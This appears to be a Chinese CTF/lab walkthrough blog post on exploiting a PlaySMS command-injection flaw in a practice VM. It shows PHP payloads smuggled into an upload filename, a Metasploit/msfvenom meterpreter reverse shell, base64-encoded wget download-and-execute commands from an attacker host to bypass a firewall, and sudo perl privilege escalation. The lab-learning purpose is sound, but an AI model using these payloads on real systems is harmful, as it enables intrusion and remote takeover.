命令注入

最新推荐文章于 2024-07-03 22:46:04 发布
最新推荐文章于 2024-07-03 22:46:04 发布
阅读量281 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/102092444
版权

靶机106攻击机109

这个不能被骗了拉,要查看源代码,不是真的什么都没有!

secure目录下载的backup需要密码

看到是mp3文件,不一定真的是mp3文件

file查看发现是文本文件,用cat 给出网址,用户名

利用挖掘到的用户名和密码登陆系统,对系统是否使用某种CMS,SMS等进行查看

利用EXP渗透

searchsploit 系统

searchsploit PlaySMS

网站也可使用https://www.exploit-db.com/exploits/42003/

将Index.php后的内容复制到网址后面即可找到渗透点

touch 1.csv

这句话意思是你可以将filename 改成<?php system('uname -a'); dia();?>.php

<?php system('id'); die();?>.php

可见存在命令注入漏洞

准备shell

启动metasploit监听 攻击机地址

 use exploit/multi/handler 
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.1.109
exploit

生成shell

msfvenom 攻击机地址

msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.1.109 lport=4444 -f elf > /var/www/html/shell

没有直接方式可以将shell发送到靶场机器

只能通过靶场机器来下载这个文件执行反弹shell

用apache服务器让靶场远程下载这个文件

绕过防火墙,上传shell

利用base64绕过防火墙检测

echo 'wget http://攻击机Ip/shell -O /tmp/shell' | base64

echo 'chmod 777 /tmp/shell' | base64

echo '/tmp/shell' | base64

利用burp抓包修改filename

<?php system(base64_decode('base64encodestring')); die();?>.php

我攻击机ip写成靶场ip了,没反弹shell,重发了一遍

首先要用输入命令shell

查看id和sudo的权限

发现www-data用户可以不需要密码

提升权限

sudo perl -e "exec '/bin/sh' "

bash -i

 

^BonnenuIt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web漏洞之命令注入
小白的博客
04-08 292
漏洞概述 使用脚本语言开发程序过程中,脚本语言开发十分快速、简介,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令数。 命令注入与远程代码执行(RCE)不一样。它们的区别是 ,通过RCE,执行的是代码 ;而在命令注入的时 ,执行的是一个(OS)命令。 漏洞成因 将用户输入作为拼接 没有对用户输入过滤 漏洞危害 继承Web服务器
命令注入总结
wywwzjj
05-21 1706
前往个人博客阅读,提升阅读体验 https://wywwzjj.top/2019/05/12/命令注入绕过总结/ 直接执行代码 PHP 中有不少可以直接执行代码的函数。 eval(); assert(); system(); exec(); shell_exec(); passthru(); escapeshellcmd(); pcntl_exec(); preg_replace( ) 代码执行...
DVWA靶场-命令注入(commandInjection)
zeroone的博客
01-09 3302
第二关:Command Injection(命令注入)       命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。 Low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS
命令注入与代码执行详解
最新发布
2301_76964281的博客
07-03 930
例如,被过滤的命令是 cat,可在终端执行 echo 'cat' | base64 得到编码后的字符串 Y2F0Cg== ,然后执行 echo 'Y2F0Cg==' | base64 -d | command ,其中 command 为要执行的具体命令,如查看文件 test.txt 的内容,即 echo 'Y2F0Cg==' | base64 -d | test.txt。$@ 表示所有参数。需要注意的是,命令注入绕过的具体方法会受到目标系统的环境、应用程序的实现以及所施加的安全限制等多种因素的影响。
DVWA靶场 Command Injection(命令注入
qq_43508668的博客
04-10 319
DVWA靶场 Command Injection(命令注入)LOWMediumHigh Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。 LOW <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target
DVWA靶场-Command Injection 命令注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-02 935
Command Injection 命令注入 Low Command Injection 核心代码 Medium Command Injection 核心代码 High Command Injection 核心代码 Impossible Command Injection 核心代码
BurpSuite靶场系列之OS命令注入
weixin_51387754的博客
10-21 752
目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。
1.深入代码/命令注入
qq_37027540的博客
10-23 508
1.深入代码/命令注入 由于没有针对代码中可执行的特殊函数入口做过滤,导致用户可以提交恶意语句,并交由服务器端执行。 代码/命令注入攻击中Web服务器没有过滤类似 system(),eval(),exec()等函数的传入参数。 代码注入 eval(string code) eval把字符串作为PHP代码执行 Code_str是PHP代码字符串,需要是一个完整的语句(结尾需要加分号)一句话木马就...
命令注入讲解ppt.pptx
08-10
命令注入讲解 命令注入是一种高危漏洞,指攻击者能够控制外部的参数达到随意执行系统命令的结果。命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击...
详解php命令注入攻击
10-17
命令注入攻击(Command Injection)指的是通过向Web应用程序输入数据,改变原本的命令执行流程,使得攻击者能够在服务器上执行任意命令。如果应用程序在执行系统命令时,没有对用户输入进行适当的过滤和限制,就会给...
python的常见命令注入威胁
12-25
不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的《python hack》PPT,里面提及了不只命令执行的威胁,那些都是我们亲身经历的代码。 千万要记得执行命令的时候,不要信任其他...
php代码审计之命令注入(3)
01-09
在提供的代码片段中,`popen()` 用于读取命令的输出,但同样需要防止命令注入。 7. **pcntl_exec()**: `pcntl_exec()` 用于替换当前进程为指定的命令,主要用于多进程编程,不是直接接收用户输入的命令,所以不在...
什么是命令注入?其原理是什么?
oldboyedu1的博客
04-21 918
命令注入的漏洞中,最为常见的是PHP命令注入。嵌入式应用程序或者web应用程序有时需要调用一些系统命令的函数,如Linux C中的system(),exec(),shell-exec()等等,当用户能够控制这些函数中的参数时,就可以将恶意参系统命令拼接到正常命令中,从而造成命令注入攻击设备系统。原理:Web应用在调用这些函数执行系统命令的时候,在没有做好过滤用户输入的情况下,如果用户将自己的输入作为系统命令的参数拼接到命令行中,就会造成命令注入的漏洞。命令注入攻击是如何形成的?
【小白靶场学习】DVWA靶场篇——Command Injection命令注入
u013569931的博客
11-14 621
人菜瘾还大的小白靶场修真路
命令注入实战靶场分析(未通关靶场2)
Flynn的博客
03-24 475
通过对2个靶场的实战,总结命令注入的常用思路
【web-攻击后端组件】(7.1)注入操作系统命令:Perl、ASP、动态执行、OS命令注入
08-20 567
注入操作系统命令】Perl、ASP、动态执行、OS命令注入
Web安全:深入解析命令注入漏洞
"命令注入是一种高风险的安全漏洞,允许攻击者通过操纵参数执行系统命令。常见于Web应用中,利用不安全的用户输入调用系统命令。与远程代码执行(RCE)不同,命令注入专注于操作系统命令,而非编程代码。此漏洞主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值